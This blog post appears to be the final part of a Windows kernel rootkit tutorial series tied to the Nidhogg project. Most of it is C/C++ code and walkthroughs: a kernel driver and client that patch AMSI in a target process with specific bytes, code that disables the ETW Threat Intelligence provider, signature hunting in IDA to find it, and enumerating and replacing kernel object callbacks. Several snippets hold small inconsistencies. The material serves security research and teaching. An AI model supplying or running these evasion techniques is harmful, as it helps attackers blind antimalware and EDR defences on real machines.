Ido Veltzman :: Security Research

Prologue

In the last blog post, we learned about two common hooking methods (IRP Hooking and SSDT Hooking) and two different injection techniques from the kernel to the user mode for both shellcode and DLL (APC and CreateThread) with code snippets and examples from Nidhogg.

In this blog post, we will write a simple driver that is capable of bypassing AMSI to demonstrate patching usermode memory from the kernel, go through credential dumping process from the kernel and finish with tampering various kernel callbacks as an example for patching kernel mode memory and last but not least - the final words and conclusion of this series.

Interacting With Usermode Memory

While there are couple of methods to perform operations from kernel mode on user mode processes, in this part I will focus on one of the most common methods that allow it with ease - KeStackAttachProcess.

When interacting with user mode process from a kernel driver the driver author would like to have a complete control over the process memory - whether it is for reading or writing memory. When using KeStackAttachProcess the current thread on the kernel mode side attaches to the process's address space, allowing it to access any memory inside the process. It is important to note that when attaching to the process's memory can prevent from async I/Os from happening and might cause deadlocks. For this reason it is very important to make the code as simple as possible and call KeUnstackDetachProcess as soon as possible.

NOTE: The following part will be a deep dive on how the function works, if you want, you can skip to the Coding AMSI Bypass Driver part.

This part, will be dedicated to go through KeStackAttachProcessthoroughly. For the sake of simplicity, I will go through the interesting branch of attaching to remote process and clean up some of the decompiled output. To give a little bit of background, KeStackAttachProcess is being called with EPROCESS of the process that will be attached as the first parameter, and a pointer to KAPC_STATE to save the original state as the second parameter. The below decompile result is done on Windows 11 22H2 and the output may be differ in different windows versions.

CurrentIrql = KeGetCurrentIrql();
__writecr8(DISPATCH_LEVEL);
if ( KiIrqlFlags && (KiIrqlFlags & 1) != 0 && CurrentIrql <= 0xFu )
{
  SchedulerAssist = KeGetCurrentPrcb()->SchedulerAssist;
  SchedulerAssist[5] |= (-1 << (CurrentIrql + 1)) & 4;
}
CurrentPrcb = KeGetCurrentPrcb();
v15 = 0;
v8 = CurrentPrcb->SchedulerAssist;
// ...
while ( _interlockedbittestandset64((volatile signed __int32 *)&CurrentThread->ThreadLock, 0LL) )
{
  // ...
  
  do
    KeYieldProcessorEx(&v15);
  while ( CurrentThread->ThreadLock );
  
  // ...
}

One of the first things that are being done, is saving the current IRQL and raising the IRQL to DISPATCH_LEVEL by writing to CR8 register, it is being done to make sure synchronization and that there are no other threads that can interrupt this process. If you are more interested to learn about IRQLs, please refer to this article by Offsec that explains more about the subject.

Later on, it waits to set the first bit of the ThreadLock of the current thread, to insure there won't be another thread that interfering with the current thread. Note that it is using _interlockedbittestandset64 which is an atomic operation to make sure it can actually write to it.

The KeYieldProcessorEx is also part of synchronization that signals the processor that the current thread needs to do the operation mentioned above. After this code block, the CurrentThread->ApcStateIndex will be checked to determine how to call KiAttachProcess - if ApcStateIndex is nonzero it means the thread is running in the target's process context, and on the first time a thread is attempting to attach to the target process it will be 0 and an extra work to save the original state will be required.

currentApcState = &currentThread->152;
currentSavedApcState = &currentThread->600;
currentThread->SavedApcState.Process = currentThread->ApcState.Process;
currentThread->SavedApcState.InProgressFlags = currentThread->ApcState.InProgressFlags;
currentThread->SavedApcState.KernelApcPending = currentThread->ApcState.KernelApcPending;
currentThread->SavedApcState.UserApcPendingAll = currentThread->ApcState.UserApcPendingAll;
v13 = currentThread->ApcState.ApcListHead[0].Flink;
if ( ($871919957987849CFE33C84F378E5D13 *)currentApcState->ApcState.ApcListHead[0].Flink == currentApcState )
{
  currentThread->SavedApcState.ApcListHead[0].Blink = currentThread->SavedApcState.ApcListHead;
  currentSavedApcState->SavedApcState.ApcListHead[0].Flink = (_LIST_ENTRY *)currentSavedApcState;
  currentThread->SavedApcState.KernelApcPending = 0;
}
else
{
  v27 = currentThread->ApcState.ApcListHead[0].Blink;
  currentSavedApcState->SavedApcState.ApcListHead[0].Flink = v13;
  currentThread->SavedApcState.ApcListHead[0].Blink = v27;
  v13->Blink = (_LIST_ENTRY *)currentSavedApcState;
  v27->Flink = (_LIST_ENTRY *)currentSavedApcState;
}
v14 = (struct _KTHREAD *)currentThread->ApcState.ApcListHead[1].Flink;
v15 = &currentThread->SavedApcState.ApcListHead[1];
if ( v14 == (struct _KTHREAD *)&currentThread->ApcStateFill[16] )
{
  currentThread->SavedApcState.ApcListHead[1].Blink = &currentThread->SavedApcState.ApcListHead[1];
  v15->Flink = v15;
  currentThread->SavedApcState.UserApcPendingAll = 0;
}
else
{
  v25 = currentThread->ApcState.ApcListHead[1].Blink;
  v15->Flink = (_LIST_ENTRY *)v14;
  currentThread->SavedApcState.ApcListHead[1].Blink = v25;
  v14->Header.WaitListHead.Flink = v15;
  v25->Flink = v15;
}
currentThread->ApcState.ApcListHead[0].Blink = currentThread->ApcState.ApcListHead;
currentThread->ApcState.ApcListHead[1].Blink = &currentThread->ApcState.ApcListHead[1];
currentThread->ApcState.ApcListHead[1].Flink = &currentThread->ApcState.ApcListHead[1];
currentApcState->ApcState.ApcListHead[0].Flink = (_LIST_ENTRY *)currentApcState;
currentThread->ApcStateIndex = 1;
*(_WORD *)&currentThread->ApcStateFill[40] = 0;
currentThread->ApcState.UserApcPendingAll = 0;

if ( ... && (_InterlockedExchangeAdd(&Process->Pcb.StackCount.Value, 8u) & 7) != 0 )// Increase stack count
{
 ...
}

Once the thread is synchronized, now it can use the SavedApcState structure to store the previous APC information such as flags, pointers, lists, etc. Once saving the APC state is done, it is added to the top of the list. Lastly, the Process->Pcb.StackCount.Value is incremented by 8, if the result is multiplications of 8, it will release the lock and then try to do similar process to acquiring the thread lock mentioned above.

if ( KiKvaShadow )
{
  v22 = Process->DirectoryTableBase;
  if ( (DirectoryTableBase & 2) != 0 )
    v22 = DirectoryTableBase | 0x8000000000000000uLL;
  __writegsqword(0x9000u, v22);
  KiSetAddressPolicy(Process->AddressPolicy);
}
result = (unsigned int)HvlEnlightenments;
if ( (HvlEnlightenments & 1) != 0 )
  result = HvlSwitchVirtualAddressSpace(DirectoryTableBase);
else
  __writecr3(DirectoryTableBase);
if ( !KiFlushPcid && KiKvaShadow )
{
  v36 = __readcr4();
  if ( (v36 & 0x20080) != 0 ) // Check if PGE is enabled or not
  {
    result = v36 ^ 0x80;
    __writecr4(v36 ^ 0x80);
    __writecr4(v36);
  }
  else
  {
    result = __readcr3();
    __writecr3(result);
  }
}

For the final part, there is a check if KvaShadow is enabled (kernel virtual addresses, explained in detail here that was introduce as a mitigation against side channel attacks such as Meltdown and if so will apply the protection accordingly.

Then, another check is performed to check if VBS (Virtual Based Security) is enabled on the system. If so, the address switching will be performed in VTL1 (If you are interested to know why this check is being performed please check Connor McGarr’s great article on the matter. If VBS isn't enabled, the CR3 register will be written directly (The CR3 register is holding the page directory base address that is then used by the processor to translate virtual addresses to physical ones). I won't go into detail with the later part as it is related to performance improvement (As far as I'm aware, KiFlushPcid is a feature that allows to not flush all TLB records each time CR3 is changed to improve performance).

Once this is done, the current thread will run in a way that it is accessible to the address space of the remote process.

Coding AMSI Bypass Driver

To code the AMSI bypass driver, we will utilize the knowledge accumulated in the previous section to attach to the remote process and modify its memory. For a more complete implementation of patching user mode memory, please look at Nidhogg’s implementation.

First, we will start with the regular definitions of the driver entry and unloading functions:

#define DRIVER_PREFIX "Patcher: "
#define DRIVER_DEVICE_NAME L"\\Device\\Patcher"
#define DRIVER_SYMBOLIC_LINK L"\\??\\Patcher"

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(RegistryPath);
NTSTATUS status = STATUS_SUCCESS;

UNICODE_STRING deviceName = RTL_CONSTANT_STRING(DRIVER_DEVICE_NAME);
UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);

// Creating device and symbolic link.
status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);

if (!NT_SUCCESS(status)) {
    KdPrint((DRIVER_PREFIX "Failed to create device: (0x%08X)\n", status));
    return status;
}

status = IoCreateSymbolicLink(&symbolicLink, &deviceName);

if (!NT_SUCCESS(status)) {
    KdPrint((DRIVER_PREFIX "Failed to create symbolic link: (0x%08X)\n", status));
    IoDeleteDevice(DeviceObject);
    return status;
}

DriverObject->DriverUnload = MyUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = PatcherCreateClose;
DriverObject->MajorFunction[IRP_MJ_WRITE] = PatcherWrite;
return status;
}

NTSTATUS PatcherCreateClose(PDEVICE_OBJECT, PIRP Irp) {
	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);
	return STATUS_SUCCESS;
}

void PatcherUnload(PDRIVER_OBJECT DriverObject) {
	KdPrint((DRIVER_PREFIX "Unloading...\n"));

	UNICODE_STRING symbolicLink = DRIVER_SYMBOLIC_LINK;
	IoDeleteSymbolicLink(&symbolicLink);
	IoDeleteDevice(DriverObject->DeviceObject);
}

For the Patch function, we will get a structure named PatchInformation that is defined as so:

struct PatchInformation {
	ULONG Pid;
	PVOID Patch;
	ULONG PatchLength;
	CHAR* FunctionName;
	WCHAR* ModuleName;
};

Now, let's define and go through the Patch function:

NTSTATUS PatchModule(PatchInformation* PatchInfo) {
	PEPROCESS TargetProcess;
	KAPC_STATE state;
	PVOID functionAddress = NULL;
	PVOID moduleImageBase = NULL;
	WCHAR* moduleName = NULL;
	CHAR* functionName = NULL;
	NTSTATUS status = STATUS_UNSUCCESSFUL;

	// Copying the values to local variables before they are unaccesible because of KeStackAttachProcess.
	SIZE_T moduleNameSize = (wcslen(PatchInformation->ModuleName) + 1) * sizeof(WCHAR);
	MemoryAllocator<WCHAR*> moduleNameAllocator(&moduleName, moduleNameSize);
	status = moduleNameAllocator.CopyData(PatchInformation->ModuleName, moduleNameSize);

	if (!NT_SUCCESS(status))
		return status;

	SIZE_T functionNameSize = (wcslen(PatchInformation->ModuleName) + 1) * sizeof(WCHAR);
	MemoryAllocator<CHAR*> functionNameAllocator(&functionName, functionNameSize);
	status = functionNameAllocator.CopyData(PatchInformation->FunctionName, functionNameSize);

	if (!NT_SUCCESS(status))
		return status;

	status = PsLookupProcessByProcessId((HANDLE)PatchInformation->Pid, &TargetProcess);

	if (!NT_SUCCESS(status))
		return status;

	// Getting the PEB.
	KeStackAttachProcess(TargetProcess, &state);
	moduleImageBase = GetModuleBase(TargetProcess, moduleName);

	if (!moduleImageBase) {
		KeUnstackDetachProcess(&state);
		ObDereferenceObject(TargetProcess);
		return STATUS_UNSUCCESSFUL;
	}

	functionAddress = GetFunctionAddress(moduleImageBase, functionName);

	if (!functionAddress) {
		KeUnstackDetachProcess(&state);
		ObDereferenceObject(TargetProcess);
		return STATUS_UNSUCCESSFUL;
	}
	KeUnstackDetachProcess(&state);

	status = KeWriteProcessMemory(ModuleInformation->Patch, TargetProcess, functionAddress, (SIZE_T)ModuleInformation->PatchLength, KernelMode);
	ObDereferenceObject(TargetProcess);
	return status;
}

The definitions for the MemoryAllocator can be found here as I will not go through it to stay focused on the subject. First thing that is being done, is copying the parameter to local variables so they will be accessible after the KeStackAttachProcess function is executed (the reason why they will not be accessible otherwise is due to reasons that explained in the previous section). Afterwards, a call to achieve the EPROCESS structure of the target process is made and if such process exists then the current thread will attach it.

The function GetModuleBase is getting the PEB of the process and searching its InLoadOrderModuleList for the base address of the given module name, in this case - the module that the user provided for patching.

PVOID moduleBase = NULL;
LARGE_INTEGER time = { 0 };
time.QuadPart = -100ll * 10 * 1000;

PREALPEB targetPeb = (PREALPEB)PsGetProcessPeb(Process);

if (!targetPeb)
	return moduleBase;

for (int i = 0; !targetPeb->LoaderData && i < 10; i++) {
	KeDelayExecutionThread(KernelMode, FALSE, &time);
}

if (!targetPeb->LoaderData)
	return moduleBase;

// Getting the module's image base.
for (PLIST_ENTRY pListEntry = targetPeb->LoaderData->InLoadOrderModuleList.Flink;
	pListEntry != &targetPeb->LoaderData->InLoadOrderModuleList;
	pListEntry = pListEntry->Flink) {

	PLDR_DATA_TABLE_ENTRY pEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);

	if (pEntry->FullDllName.Length > 0) {
		if (IsIContained(pEntry->FullDllName, moduleName)) {
			moduleBase = pEntry->DllBase;
			break;
		}
	}
}

return moduleBase;

Next, the GetFunctionAddress is called to iterate the export table of that module and search for a specific function within it.

PVOID functionAddress = NULL;
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)moduleBase;

if (!dosHeader)
	return functionAddress;

// Checking that the image is valid PE file.
if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE)
	return functionAddress;

PFULL_IMAGE_NT_HEADERS ntHeaders = (PFULL_IMAGE_NT_HEADERS)((PUCHAR)moduleBase + dosHeader->e_lfanew);

if (ntHeaders->Signature != IMAGE_NT_SIGNATURE)
	return functionAddress;

IMAGE_OPTIONAL_HEADER optionalHeader = ntHeaders->OptionalHeader;

if (optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress == 0)
	return functionAddress;

// Iterating the export directory.
PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PUCHAR)moduleBase + optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

DWORD* addresses = (DWORD*)((PUCHAR)moduleBase + exportDirectory->AddressOfFunctions);
WORD* ordinals = (WORD*)((PUCHAR)moduleBase + exportDirectory->AddressOfNameOrdinals);
DWORD* names = (DWORD*)((PUCHAR)moduleBase + exportDirectory->AddressOfNames);

for (DWORD j = 0; j < exportDirectory->NumberOfNames; j++) {
	if (_stricmp((char*)((PUCHAR)moduleBase + names[j]), functionName) == 0) {
		functionAddress = (PUCHAR)moduleBase + addresses[ordinals[j]];
		break;
	}
}

return functionAddress;

Once the function address achieved, it now can be patched using the KeWriteProcessMemory function to overwrite it with the given patch.

NTSTATUS KeWriteProcessMemory(PVOID sourceDataAddress, PEPROCESS TargetProcess, PVOID targetAddress, SIZE_T dataSize, MODE mode) {
	HANDLE hTargetProcess;
	ULONG oldProtection;
	SIZE_T patchLen;
	SIZE_T bytesWritten;
	NTSTATUS status = STATUS_SUCCESS;

	if (mode != KernelMode && mode != UserMode)
		return STATUS_UNSUCCESSFUL;

	// Making sure that the given kernel mode address is valid.
	if (mode == KernelMode && (!VALID_KERNELMODE_MEMORY((DWORD64)sourceDataAddress) || !VALID_ADDRESS((DWORD64)targetAddress))) {
		status = STATUS_UNSUCCESSFUL;
		return status;
	}
	else if (mode == UserMode && (!VALID_USERMODE_MEMORY((DWORD64)sourceDataAddress) || !VALID_ADDRESS((DWORD64)targetAddress))) {
		status = STATUS_UNSUCCESSFUL;
		return status;
	}

	// Adding write permissions.
	status = ObOpenObjectByPointer(TargetProcess, OBJ_KERNEL_HANDLE, NULL, PROCESS_ALL_ACCESS, *PsProcessType, (KPROCESSOR_MODE)mode, &hTargetProcess);

	if (!NT_SUCCESS(status)) {
		return status;
	}

	patchLen = dataSize;
	PVOID addressToProtect = targetAddress;
	status = ZwProtectVirtualMemory(hTargetProcess, &addressToProtect, &patchLen, PAGE_READWRITE, &oldProtection);

	if (!NT_SUCCESS(status)) {
		ZwClose(hTargetProcess);
		return status;
	}
	ZwClose(hTargetProcess);

	// Writing the data.
	status = MmCopyVirtualMemory(PsGetCurrentProcess(), sourceDataAddress, TargetProcess, targetAddress, dataSize, KernelMode, &bytesWritten);

	// Restoring permissions and cleaning up.
	if (ObOpenObjectByPointer(TargetProcess, OBJ_KERNEL_HANDLE, NULL, PROCESS_ALL_ACCESS, *PsProcessType, (KPROCESSOR_MODE)mode, &hTargetProcess) == STATUS_SUCCESS) {
		patchLen = dataSize;
		ZwProtectVirtualMemory(hTargetProcess, &addressToProtect, &patchLen, oldProtection, &oldProtection);
		ZwClose(hTargetProcess);
	}

	return status;
}

KeWriteProcessMemory is doing several things, first a check is performed on the given source and destination addresses to validate that they are valid addresses. Then, a handle to the process is acquired through ObOpenObjectByPointer using the EPROCESS given as a parameter, later on the protection is changed to PAGE_READWRITE to ensure there are write permissions and finally the data is copied using MmCopyVirtualMemory to copy the data.

To finish, need to implement a function that can receive user input:

NTSTATUS PatcherWrite(PDEVICE_OBJECT, PIRP Irp) {
	PatchInformation patchedModule{};
	NTSTATUS status = STATUS_SUCCESS;
	SIZE_T len = 0;
	auto stack = IoGetCurrentIrpStackLocation(Irp);

	auto size = stack->Parameters.DeviceIoControl.InputBufferLength;

	if (size == 0 || size % sizeof(PatchInformation) != 0) {
		status = STATUS_INVALID_BUFFER_SIZE;
		goto Exit;
	}

	auto data = (PatchInformation*)Irp->AssociatedIrp.SystemBuffer;
	patchedModule.Pid = data->Pid;
	patchedModule.PatchLength = data->PatchLength;
	
	SIZE_T strSize = strlen(data->FunctionName);
	MemoryAllocator<CHAR*> functionNameAllocator(&patchedModule.FunctionName, strSize);
	status = functionNameAllocator.CopyData(data->FunctionName, strSize);
	
	if (!NT_SUCCESS(status))
		break;
	
	strSize = wcslen(data->ModuleName) * sizeof(WCHAR);
	MemoryAllocator<WCHAR*> moduleNameAllocator(&patchedModule.ModuleName, strSize);
	status = moduleNameAllocator.CopyData(data->ModuleName, strSize);
	
	if (!NT_SUCCESS(status))
		break;
	
	MemoryAllocator<PVOID> patchAllocator(&patchedModule.Patch, data->PatchLength);
	status = patchAllocator.CopyData(data->Patch, data->PatchLength);
	
	if (!NT_SUCCESS(status))
		break;
	
	if (data->Pid <= 4) {
		Print(DRIVER_PREFIX "Invalid PID.\n");
		status = STATUS_INVALID_PARAMETER;
		break;
	}
	status = PatchModule(&patchedModule);

	len += sizeof(PatchInformation);
	Irp->IoStatus.Status = status;
	Irp->IoStatus.Information = len;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);
	return STATUS_SUCCESS;
}

And for the user mode side:

int main() {
DWORD bytesWritten;
std::vector<byte> patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
    
    if (hDrv == INVALID_HANDLE_VALUE)
		    return 0;
		
		PatchInformation patchedModule{}
		
		patchedModule.Pid = pid;
		patchedModule.PatchLength = (ULONG)patch.size();
		patchedModule.ModuleName = moduleName;
		patchedModule.FunctionName = functionName;
		patchedModule.Patch = patch.data();

    if (pid <= SYSTEM_PID || patchedModule.ModuleName == nullptr || 
	patchedModule.FunctionName == nullptr || patchedModule.Patch == nullptr) {
			CloseHandle(hDrv);
			return 0;
	}

    BOOL result = WriteFile(hDrv, &patchedModule, sizeof(patchedModule), &bytesWritten, NULL)
    
    if (result)
		    std::cout << "Patched!" << std::endl;
		else
				std::cout << "Failed to patch" << std::endl;
		
    CloseHandle(hDrv);
    return result;
}

Interacting With Kernel Memory

Interacting with kernel mode memory is different from interacting with user mode memory in some ways, one of them being that there is no need for attaching to different processes to access memory and the main limitation is Kernel Patch Protection (PatchGuard). There are several deep dive articles about PatchGuard (and I also explained a little about it in my talk) so I won't go too deep into it. Generally speaking, PatchGuard is protecting certain critical objects (tables, lists, registers, etc) and scans the device once each certain period of time (this time is randomly generated each boot), if it finds mismatch it will crash the system with error code 0x109 (CRITICAL_STRUCTURE_CORRUPTION) . The full list of protected objects is available in MSDN.

Other than that, modification to kernel objects will cause no issue (if done correctly) and will not crash the system. An example of it can be enabling / disabling ETW-TI:

NTSTATUS EnableDisableEtwTI(bool enable) {
	NTSTATUS status = STATUS_SUCCESS;
	EX_PUSH_LOCK etwThreatIntLock = NULL;
	ULONG foundIndex = 0;
	SIZE_T bytesWritten = 0;
	SIZE_T etwThreatIntProvRegHandleSigLen = sizeof(EtwThreatIntProvRegHandleSignature1);

	// Getting the location of KeInsertQueueApc dynamically to get the real location.
	UNICODE_STRING routineName = RTL_CONSTANT_STRING(L"KeInsertQueueApc");
	PVOID searchedRoutineAddress = MmGetSystemRoutineAddress(&routineName);

	if (!searchedRoutineAddress)
		return STATUS_NOT_FOUND;

	SIZE_T targetFunctionDistance = EtwThreatIntProvRegHandleDistance;
	PLONG searchedRoutineOffset = (PLONG)FindPattern((PUCHAR)&EtwThreatIntProvRegHandleSignature1,
		0xCC, etwThreatIntProvRegHandleSigLen - 1,
		searchedRoutineAddress, targetFunctionDistance,
		&foundIndex, (ULONG)etwThreatIntProvRegHandleSigLen);

	if (!searchedRoutineOffset) {
		searchedRoutineOffset = (PLONG)FindPattern((PUCHAR)&EtwThreatIntProvRegHandleSignature2,
			0xCC, etwThreatIntProvRegHandleSigLen - 1,
			searchedRoutineAddress, targetFunctionDistance,
			&foundIndex, (ULONG)etwThreatIntProvRegHandleSigLen);

		if (!searchedRoutineOffset)
			return STATUS_NOT_FOUND;
	}
	PUCHAR etwThreatIntProvRegHandle = (PUCHAR)searchedRoutineAddress + (*searchedRoutineOffset) + foundIndex + EtwThreatIntProvRegHandleOffset;
	ULONG enableProviderInfoOffset = GetEtwProviderEnableInfoOffset();

	if (enableProviderInfoOffset == (ULONG)STATUS_UNSUCCESSFUL)
		return STATUS_UNSUCCESSFUL;

	PTRACE_ENABLE_INFO enableProviderInfo = (PTRACE_ENABLE_INFO)(etwThreatIntProvRegHandle + EtwGuidEntryOffset + enableProviderInfoOffset);
	ULONG lockOffset = GetEtwGuidLockOffset();

	if (lockOffset != (ULONG)STATUS_UNSUCCESSFUL) {
		etwThreatIntLock = (EX_PUSH_LOCK)(etwThreatIntProvRegHandle + EtwGuidEntryOffset + lockOffset);
		ExAcquirePushLockExclusiveEx(&etwThreatIntLock, 0);
	}

	if (enable) {
		status = MmCopyVirtualMemory(PsGetCurrentProcess(), &this->PrevEtwTiValue, PsGetCurrentProcess(), &enableProviderInfo->IsEnabled, sizeof(ULONG), KernelMode, &bytesWritten);

		if (NT_SUCCESS(status))
			this->PrevEtwTiValue = 0;
	}
	else {
		ULONG disableEtw = 0;
		status = NidhoggMemoryUtils->KeReadProcessMemory(PsGetCurrentProcess(), &enableProviderInfo->IsEnabled, &this->PrevEtwTiValue, sizeof(ULONG), KernelMode);

		if (NT_SUCCESS(status))
			status = MmCopyVirtualMemory(PsGetCurrentProcess(), &disableEtw, PsGetCurrentProcess(), &enableProviderInfo->IsEnabled, sizeof(ULONG), KernelMode, &bytesWritten);
	}

	if (etwThreatIntLock)
		ExReleasePushLockExclusiveEx(&etwThreatIntLock, 0);

	return status;
}

ETW-TI is an ETW provider that is created by Microsoft to provide insights on specific operations that happens on the system via specific syscall monitoring. The reason Microsoft created that provider is that back in the days both antimalware and malwares abused the ability to filter syscalls (via SSDT hooking and other methods) for monitoring syscall execution. To give the ability to monitor important syscalls with lower risk to the user, Microsoft created an ETW provider that an authorized antimalware vendor (the vendor need to get a proper signature from Microsoft to register to that provider) can use.

To disable it, first the address of the ETW-TI provider and its lock are found via signature (more on that in the next section), then the lock is acquired to ensure safe modification of the provider and lastly the value is changed via MmCopyVirtualMemory . As you can see, there was no need to attach to specific process or change any page permission making it easier to modify target memory but also making it more prone to mistakes by the developer.

Signature Making Process

In this section, I will use the previous example of ETW-TI disabling to show the process of finding and creating a signature via IDA Free (it doesn't matter which SRE (software reverse engineering) is used, use whatever you feel more comfortable with :) ). To create the best signature, it is preferable to check against several Windows versions but for the sake of the explanation I will document the process for Windows 11 22H2.

The first thing that is needed to be done is to find the ETW-TI handle in first place. To do so, it is best to look at the function that initializing all ETW providers - EtwpInitialize. After a quick looking the handler is found:

; ...
lea     r9, EtwThreatIntProvRegHandle
xor     r8d, r8d
xor     edx, edx
lea     rcx, ThreatIntProviderGuid
call    EtwRegister
; ...

So now that we know that EtwThreatIntProvRegHandle is the target handle, we can look at xrefs to it and see if there is any exported function that using it. From searching in xrefs, the only function that is using it (in the searched version) and is exported is KeInsertQueueApc . The reason behind searching an exported function is to find the target objects with as little signatures as possible.

; ...
push    r14
push    r15
sub     rsp, 60h
mov     r12, r8
mov     r13, rdx
mov     rsi, rcx
xor     edx, edx
mov     rcx, cs:EtwThreatIntProvRegHandle
mov     r8d, 3000h
call    EtwProviderEnabled
; ...

Now, we can create a signature using the mov rcx, operation (if the opcodes of the target aren't the first occurrence, the signature will be created using couple of instructions i.e. xor edx, edx; mov rcx, cs:EtwThreatIntProvRegHandle). To see the bytes conveniently in IDA we can change the amount of bytes seen next to the instruction by navigating to Options → General and change the Number of opcode bytes (graph) from 0 to 8.

; ...
41 56                   push    r14
41 57                   push    r15
48 83 EC 60             sub     rsp, 60h
4D 8B E0                mov     r12, r8
4C 8B EA                mov     r13, rdx
48 8B F1                mov     rsi, rcx
33 D2                   xor     edx, edx
48 8B 0D 8D 18 91 00    mov     rcx, cs:EtwThreatIntProvRegHandle
41 B8 00 30 00 00       mov     r8d, 3000h
E8 2A 04 00 00          call    EtwProviderEnabled
; ...

Since now we see hat 48 8B is repeating itself above, we can use theD2 above to create the signature: D2 48 8B and know that the offset to the handle will be in baseAddress + foundIndex + offset(usually this is the calculation but it might shift a little depends on the instructions) where the offset will be 3 in this case, the foundIndex is the index that this signature was found in the function and baseAddress is the address of the function (in this case, KeInsertQueueApc).

Now, all that is left to do is to repeat the process for the lock as well and assign a proper variable with the right type.

Patching Kernel Callbacks

Another example for modifying kernel mode memory can be patching kernel callbacks. The kernel callbacks are stored inside different linked lists, one for each callback type. To find the list, usually we will need to go through a process of creating a signature and binary searching the object (NOTE: It is super important to notice that when searching need to make sure the searched address is valid and not searching within discardable page or it might cause a BSOD). However, I want to show the different case of object callbacks (if you want, you can refresh your memory on object callbacks here).

NTSTATUS ListObCallbacks(ObCallbacksList* Callbacks) {
	NTSTATUS status = STATUS_SUCCESS;
	PFULL_OBJECT_TYPE objectType = NULL;
	CHAR driverName[MAX_DRIVER_PATH] = { 0 };
	errno_t err = 0;
	ULONG index = 0;

	switch (Callbacks->Type) {
	case ObProcessType:
		objectType = (PFULL_OBJECT_TYPE)*PsProcessType;
		break;
	case ObThreadType:
		objectType = (PFULL_OBJECT_TYPE)*PsThreadType;
		break;
	default:
		status = STATUS_INVALID_PARAMETER;
		break;
	}

	if (!NT_SUCCESS(status))
		return status;

	ExAcquirePushLockExclusive((PULONG_PTR)&objectType->TypeLock);
	POB_CALLBACK_ENTRY currentObjectCallback = (POB_CALLBACK_ENTRY)(&objectType->CallbackList);

	if (Callbacks->NumberOfCallbacks == 0) {
		do {
			if (currentObjectCallback->Enabled) {
				if (currentObjectCallback->PostOperation || currentObjectCallback->PreOperation)
					Callbacks->NumberOfCallbacks++;
			}
			currentObjectCallback = (POB_CALLBACK_ENTRY)currentObjectCallback->CallbackList.Flink;
		} while ((PVOID)currentObjectCallback != (PVOID)(&objectType->CallbackList));
	}
	else {
		do {
			if (currentObjectCallback->Enabled) {
				if (currentObjectCallback->PostOperation) {
					if (NT_SUCCESS(MatchCallback(currentObjectCallback->PostOperation, driverName))) {
						err = strcpy_s(Callbacks->Callbacks[index].DriverName, driverName);

						if (err != 0) {
							status = STATUS_ABANDONED;
							break;
						}
					}

					Callbacks->Callbacks[index].PostOperation = currentObjectCallback->PostOperation;
				}
				if (currentObjectCallback->PreOperation) {
					if (NT_SUCCESS(MatchCallback(currentObjectCallback->PreOperation, driverName))) {
						err = strcpy_s(Callbacks->Callbacks[index].DriverName, driverName);

						if (err != 0) {
							status = STATUS_ABANDONED;
							break;
						}
					}

					Callbacks->Callbacks[index].PreOperation = currentObjectCallback->PreOperation;
				}
				index++;
			}
			currentObjectCallback = (POB_CALLBACK_ENTRY)currentObjectCallback->CallbackList.Flink;
		} while (index != Callbacks->NumberOfCallbacks && (PVOID)currentObjectCallback != (PVOID)(&objectType->CallbackList));
	}
	ExReleasePushLockExclusive((PULONG_PTR)&objectType->TypeLock);
	return status;
}

In this function, there is no binary searching or any signature, instead the exported Ps*Type is used to enumerate the callbacks. The reason being, that for object callbacks there is no internal list that is being used, instead the callbacks are saved inside a list in the corresponding object type itself in a structure called CallbackList. Conveniently, the TypeLock is available to acquire from the list as well.

From there, it is a matter of acquiring the lock, iterating the list and find the wanted callback by checking if it matches the user provided callback (this current function also lists the callbacks, and finding the corresponding driver name by searching where the callback is located using the address range of each driver) and if it matches it will replace the callback with a dummy callback (or restore the original one, depends on the user input) that does not do anything.

The End?

I have thought for a long time when and how to end this series. From a small “hello world” driver to one of the drivers with most features and support in all Windows versions since the first release of Windows 10 - this was definitely quite a journey and of course, I cannot forget about this blog series as well.

I can’t thank enough for all the people that helped to proofread the posts, gave advices and points for improvement and the hours upon hours of debugging, reversing and coding for this series and Nidhogg - it was a hell of a ride.

While I’m writing this in past tense, this is far from being the reality. As in the last couple of months I worked (and working) on amazing projects that some will be released in the following months and some might take a little longer than that (and also, there will be some minor improvements, fixes and features for Nidhogg as well!).

I’m glad to see that several people has been motivated (some told me that by directly reaching out - which I encourage you to do!) from Nidhogg and Lord Of The Ring0 to create their own rootkit and get into this marvelous world of windows kernel development.

To answer this section’s question - while this is the end of Lord Of The Ring0 and there won’t be any major updates to Nidhogg in the foreseen future this is definitely not the end of the kernel development journey but merely the start of it so expect new blog posts, new projects and some novel research because now it is when it really going to begin. It is finally time to level up.

Lord Of The Ring0 - Part 6 | Conclusion